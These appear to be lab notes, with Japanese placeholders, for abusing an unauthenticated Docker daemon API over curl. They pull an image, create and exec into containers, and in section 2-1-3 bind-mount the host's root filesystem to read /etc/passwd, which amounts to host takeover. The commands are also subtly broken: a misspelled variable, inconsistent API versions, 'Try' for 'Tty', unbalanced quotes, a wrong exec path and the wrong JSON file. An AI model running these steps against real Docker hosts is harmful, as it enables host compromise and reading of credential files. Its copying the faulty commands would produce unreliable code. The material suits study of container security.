2-1-1
export DOCKER_DAEMON=VMのIPアドレス:2375
curl -X POST "http://$DOCKER_DEAEMON/v1.43/images/create?fromImage=alpine&tag=3.18.3"
curl http://$DOCKER_DEAEMON/v1.43/images/json | jq .
vim container-create.json

{
"AttachStdin":false,
"AttachStdout":true,
"AttachStderr":true,
"Try":true,
"OpenStdin":false,
"StdinOnce":false,
"EntryPoint":"/bin/sh",
"image":"alpine:3.18.3"

}

curl -X POST -H 'Content-Type:application/json' -d @container-create.json "http://$DOCKER_DEAEMON/v1.4.3/containers/create"

export CONTAINER_ID=<コンテナID>
curl -X POST　http://$DOCKER_DEAEMON/v1.4.3/containers/$CONTAINER_ID/start
curl http://$DOCKER_DEAEMON/v1.4.3/containers/json?all=true |jq .


2-1-2
vim container-exec.json

{
"AttachStdin":true,
"AttachStdout":true,
"AttachStderr":true,
"Try":true,
"DetachKeys":"ctrl-p,ctrl-q",
"Cmd":[
"cat",
"/etc/issue"
]
}

curl -X POST -H 'Content-Type:application/json' -d @container-create.json http://$DOCKER_DEAEMON/v1.4.3/$CONTAINER_ID/exec
curl -X POST -H 'Content-Type:application/json' -d  {"Detach":false,"Try":false}' http://$DOCKER_DEAEMON/v1.4.3/exec/<ExecインスタンスID>/start -o ./exec-result.txt

cat exec-result.txt

2-1-3
vim container-create_mount-root.json
{
"AttachStdin":true,
"AttachStdout":true,
"AttachStderr":true,
"Try":true,
"OpenStdin":true,
"StdinOnce":true,
"EntryPoint":"/bin/sh",
"image":"alpine:3.18.3",
"Volumes":{"/host-root/":{}},
"HostConfig":{"Binds":["/:/host-root"]}}



curl -X POST -H 'Content-Type:application/json' -d @container-create_mount-root.json "http://$DOCKER_DEAEMON/v1.4.3/containers/create"
export CONTAINER_ID=<コンテナID>
curl -X POST　http://$DOCKER_DEAEMON/v1.4.3/containers/$CONTAINER_ID/start

vim container-create_exec_mount-root.json
{
"AttachStdin":true,
"AttachStdout":true,
"AttachStderr":true,
"Try":true,
"DetachKeys":"ctrl-p,ctrl-q",
"Cmd":[
"cat",
"/host-root/etc/passwd"
]
}





curl -X POST -H 'Content-Type:application/json' -d @container-create_exec_mount-root.json http://$DOCKER_DEAEMON/v1.4.3/$CONTAINER_ID/exec

curl -X POST -H 'Content-Type:application/json' -d  {"Detach":false,"Try":false}' http://$DOCKER_DEAEMON/v1.4.3/exec/<ExecインスタンスID>/start -o ./exec-mount-result.txt





